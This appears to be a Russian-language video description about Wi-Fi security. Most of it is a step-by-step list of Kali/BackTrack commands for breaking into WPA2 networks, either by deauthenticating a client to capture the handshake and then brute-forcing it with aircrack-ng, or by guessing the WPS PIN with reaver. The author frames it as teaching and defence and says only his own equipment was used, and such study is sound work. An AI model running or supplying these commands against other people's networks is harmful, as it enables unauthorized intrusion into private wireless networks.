Обсудить компьютерную безопасность можно на моем новом форуме в этой ветке - \r \r Если вам понравилось это видео, то не пропустите мой новый ролик про ARP-спуфинг - \r \r Внимание! BackTrack больше неактуален, скачивайте Kali Linux (там все практически также как и в BackTrack) - \r \r Список поддерживаемых беспроводных адаптеров для BackTrack 5 - \r \r Про WPA - \r \r Словари для брутфорса - \r Здесь можно скачать BackTrack (НЕАКТУАЛЬНО, на данный момент его поддержка прекращена и сейчас актуален Kali Linux) - \r \r Kali Linux - \r \r Список команд для BackTrack которые я использовал в видео с описанием:\r -----------------------------------------------------------------------------------------------------------------\r 1. Взлом путем перехвата HandShake:\r ---узнаем имя нашей карты wifi---\r ifconfig wlan\r ---переводим ее в режим мониторинга---\r airmon-ng start wlan0\r ---сканируем доступные wifi сети (что-бы остановить нажмите ctrl+c)---\r airodump-ng mon0\r ---запускаем сканирование интересующей сети и сохраняем пакеты (ждем рукопожатия)---\r airodump-ng mon0 --channel x --bssid xx:xx:xx:xx:xx:xx -w /root/Desktop/WPA\r ---отключаем клиента от интересующей нас сети что-бы получить handshake---\r aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0\r ---запускаем перебор по словарю---\r aircrack-ng -w /root/Desktop/Dictionary.dic -b xx:xx:xx:xx:xx:xx /root/Desktop/WPA*.cap\r -----------------------------------------------------------------------------------------------------------------\r 2. Взлом путем подбора PIN от WPS\r ---узнаем имя нашей карты wifi---\r ifconfig wlan\r ---переводим ее в режим мониторинга---\r airmon-ng start wlan0\r ---сканируем точки доступа с включенным режимом WPS (если пункт WPS-Loced в значении no, точка подвержена взлому)---\r wash -i mon0\r ---запускаем подбор PIN (т.к. цифр 8 то комбинаций 100 000 000) у точки mac-адрес которой узнали из предыдущей команды---\r reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv\r \r В этом ролике я постарался описать как вообще работает Wi-Fi, как происходит авторизация и рассказал о технологии WPA2-PSK, WPS, AES и TKIP, а также о методах шифрования трафика в wi-fi и стандарте ieee.802.11i и о том что такое 4-х стороннее рукопожатие (4-way handshake). А еще посмотрев этот ролик вы узнаете как можно взломать wi-fi сеть, почему такое происходит и как попытаться от этого защититься. Все что я делал в ролике было выполнено на моем личном оборудовании и ничьих сетей я не взламывал.
Be the first to comment